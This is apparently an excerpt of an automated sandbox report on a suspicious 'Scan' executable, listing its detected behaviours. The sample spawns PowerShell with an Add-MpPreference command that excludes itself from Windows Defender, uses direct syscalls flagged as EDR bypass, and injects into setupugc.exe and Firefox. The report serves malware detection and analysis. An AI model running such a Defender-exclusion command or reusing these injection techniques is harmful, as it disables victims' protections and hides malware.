            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109F460 mov eax, dword ptr fs:[00000030h]3_2_0109F460
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109F460 mov eax, dword ptr fs:[00000030h]3_2_0109F460
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109F460 mov eax, dword ptr fs:[00000030h]3_2_0109F460
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109F460 mov eax, dword ptr fs:[00000030h]3_2_0109F460
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109F460 mov eax, dword ptr fs:[00000030h]3_2_0109F460
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109F460 mov eax, dword ptr fs:[00000030h]3_2_0109F460
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0115547F mov eax, dword ptr fs:[00000030h]3_2_0115547F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AA470 mov eax, dword ptr fs:[00000030h]3_2_010AA470
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AA470 mov eax, dword ptr fs:[00000030h]3_2_010AA470
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AA470 mov eax, dword ptr fs:[00000030h]3_2_010AA470
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B480 mov eax, dword ptr fs:[00000030h]3_2_0107B480
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01089486 mov eax, dword ptr fs:[00000030h]3_2_01089486
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01089486 mov eax, dword ptr fs:[00000030h]3_2_01089486
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110A4B0 mov eax, dword ptr fs:[00000030h]3_2_0110A4B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010864AB mov eax, dword ptr fs:[00000030h]3_2_010864AB
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B34B0 mov eax, dword ptr fs:[00000030h]3_2_010B34B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B44B0 mov ecx, dword ptr fs:[00000030h]3_2_010B44B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe"
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtClose: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory written: C:\Users\user\Desktop\Scan 00093847.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: NULL target: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeSection loaded: NULL target: C:\Windows\SysWOW64\setupugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\setupugc.exeThread register set: target process: 1852Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\setupugc.exeThread APC queued: target process: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess created: C:\Users\user\Desktop\Scan 00093847.exe "C:\Users\user\Desktop\Scan 00093847.exe"Jump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: uspEUeZyrqFDmi.exe, 00000008.00000002.3553279454.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000000.1984128442.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000000.2137797903.00000000010C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: uspEUeZyrqFDmi.exe, 00000008.00000002.3553279454.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000000.1984128442.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000000.2137797903.00000000010C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: uspEUeZyrqFDmi.exe, 00000008.00000002.3553279454.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000000.1984128442.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000000.2137797903.00000000010C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: uspEUeZyrqFDmi.exe, 00000008.00000002.3553279454.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000000.1984128442.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000000.2137797903.00000000010C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Users\user\Desktop\Scan 00093847.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
